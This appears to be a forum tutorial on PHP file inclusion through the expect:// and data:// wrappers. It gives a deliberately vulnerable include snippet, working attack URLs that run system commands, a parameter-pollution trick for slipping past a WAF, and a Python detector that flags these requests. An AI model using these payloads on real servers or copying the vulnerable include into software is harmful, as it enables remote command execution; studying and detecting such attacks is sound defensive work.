Since I’ve not seen some of these methods covered around here (except for php://filter and php://input), I decided to put up some material on ‘em. Basically, they are more than self-explanatory but I still feel the need to tutorialize the process. First of all, in order to execute anything, you’d need to comply with the following conditions:
- A $_GET parameter - the one we'll be passing the payload to
- Version of PHP - 4.3+ for expect:// and 5.2+ for data://
- The allow_url_include directive enabled - otherwise the remote wrappers are refused by include()
expect://
The expect:// wrapper is not enabled by default, since it comes from the PECL expect extension (consider it installed for now). The syntax it accepts is:
expect://[command]
Consider this small snippet running on the backend:
<?php
// Vulnerable on purpose: the include path comes straight from the query string,
// so any enabled stream wrapper (expect://, data://, ...) is accepted.
include $_GET['page'];
//..
?>
Now we can run pretty much anything through it, so take the following URL for instance:
http://example.com/Keeper.php?page=expect://id

data://
The data:// wrapper works on the same principle. The syntax is:
data://text/plain;base64,[command encoded in base64]
or, without the encoding, simply:
data://text/plain,[command]
Assuming the same include of the $_GET parameter as above, there are two possible scenarios:
http://example.com/Keeper.php?page=data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=
http://example.com/Keeper.php?page=data://text/plain,<?system('id');?>
If a WAF filters out the code that follows the wrapper, as in the last examples, we can use HTTP parameter pollution to split the payload into two parts; the two parameters are then concatenated with a comma between them, like so:
http://example.com/Keeper.php?page=data://text/plain&page=<?system('id');?>
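From the defensive side, all three request shapes above (a bare expect:// value, a base64 data: URI, and the polluted two-part form) can be flagged before they reach include() by decoding the parameter a few layers deep and checking every possible reassembly of duplicate parameters. The following Python triage helper is an added example, not code from the original post; inspect_request, its finding strings and the wrapper list are my own choices.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus, urlsplit

WRAPPER_SCHEMES = ("expect:", "data:", "php:", "phar:", "file:", "http:", "https:", "ftp:")  # never from user input
B64_PAYLOAD = re.compile(r";base64,([A-Za-z0-9+/=]+)")


def query_values(url, param):
    """All values of `param`, in order, so duplicated (polluted) parameters are kept."""
    values = []
    for pair in urlsplit(url).query.split("&"):
        key, _, val = pair.partition("=")
        if unquote_plus(key) == param:
            values.append(unquote_plus(val))
    return values


def decode_layers(value, depth=3):
    """Yield `value` plus its URL-decoded and base64-decoded layers, a few levels deep."""
    stack = [(value, 0)]
    while stack:
        v, d = stack.pop()
        yield v
        if d >= depth:
            continue
        if unquote(v) != v:                      # another URL-encoding layer
            stack.append((unquote(v), d + 1))
        m = B64_PAYLOAD.search(v)                # data: URIs often carry base64 bodies
        if m:
            try:
                raw = base64.b64decode(m.group(1), validate=True)
                stack.append((raw.decode("utf-8", "replace"), d + 1))
            except ValueError:
                pass


def inspect_request(url, param="page"):
    """Return sorted, de-duplicated findings for one request URL."""
    values = query_values(url, param)
    # Check each value alone (last-wins backends) and comma-joined (concatenating backends).
    candidates = set(values) | ({",".join(values)} if len(values) > 1 else set())
    findings = set()
    for candidate in candidates:
        for layer in decode_layers(candidate):
            for scheme in WRAPPER_SCHEMES:
                if layer.lower().startswith(scheme):
                    findings.add(f"wrapper {scheme}// in {param}")
            if "<?" in layer:
                findings.add(f"php open tag in {param}")
    return sorted(findings)
```

Feeding the URLs quoted above to inspect_request() flags each of them, while a plain page=about yields no findings.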
For the HPP part, I have this covered here and won't rephrase it again:
IDS & WAF Evasion with HTTP Parameter Pollution
Small and tidy.